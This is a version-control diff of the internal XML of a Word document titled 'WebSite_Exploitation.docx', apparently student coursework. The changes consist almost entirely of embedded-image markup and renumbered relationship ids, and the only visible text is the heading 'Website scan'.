--- a/BCA_III/WebSite_Exploitation.docx
+++ b/BCA_III/WebSite_Exploitation.docx
@@ -7,6 +7,380 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="2683994"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2683994"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="1604494"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="5" name="Picture 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 10"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1604494"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="2070153"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="6" name="Picture 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 13"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2070153"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="1301556"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="8" name="Picture 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 16"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1301556"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="1341379"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="Picture 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 19"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1341379"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="1958302"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="22" name="Picture 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 22"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1958302"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="2181552"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="Picture 25"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 25"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2181552"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5943600" cy="3327355"/>
@@ -25,7 +399,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId11"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -84,7 +458,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId12"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -142,7 +516,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId13"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -198,7 +572,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId14"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -256,7 +630,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId15"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -308,7 +682,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId16"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -360,7 +734,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId17"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -413,7 +787,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId18"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -466,7 +840,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId19"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -520,7 +894,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId20"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -578,7 +952,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId21"/>
                     <a:srcRect l="-1048" b="717"/>
                     <a:stretch>
                       <a:fillRect/>
@@ -637,7 +1011,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId22"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -673,6 +1047,62 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5943600" cy="1992814"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="12" name="Picture 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 28"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1992814"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln w="9525">
+                      <a:noFill/>
+                      <a:miter lim="800000"/>
+                      <a:headEnd/>
+                      <a:tailEnd/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Website scan</w:t>
       </w:r>
@@ -1013,7 +1443,7 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:hyperlink r:id="rId16" w:history="1">
+      <w:hyperlink r:id="rId24" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1046,7 +1476,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId25"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -1436,7 +1866,7 @@
         <w:t xml:space="preserve">u  </w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
-      <w:hyperlink r:id="rId18" w:history="1">
+      <w:hyperlink r:id="rId26" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>

--- a/BCA_III/WebSite_Exploitation.docx
+++ b/BCA_III/WebSite_Exploitation.docx
@@ -2,1108 +2,9 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:body>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="2683994"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="3" name="Picture 7"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 7"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2683994"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1604494"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="5" name="Picture 10"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 10"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1604494"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="2070153"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="6" name="Picture 13"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 13"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="2070153"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1301556"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="8" name="Picture 16"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 16"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1301556"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1341379"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="9" name="Picture 19"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 19"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
-                    <a:srcRect/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="1341379"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln w="9525">
-                      <a:noFill/>
-                      <a:miter lim="800000"/>
-                      <a:headEnd/>
-                      <a:tailEnd/>
-                    </a:ln>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5943600" cy="1958302"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="22" name="Picture 22"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
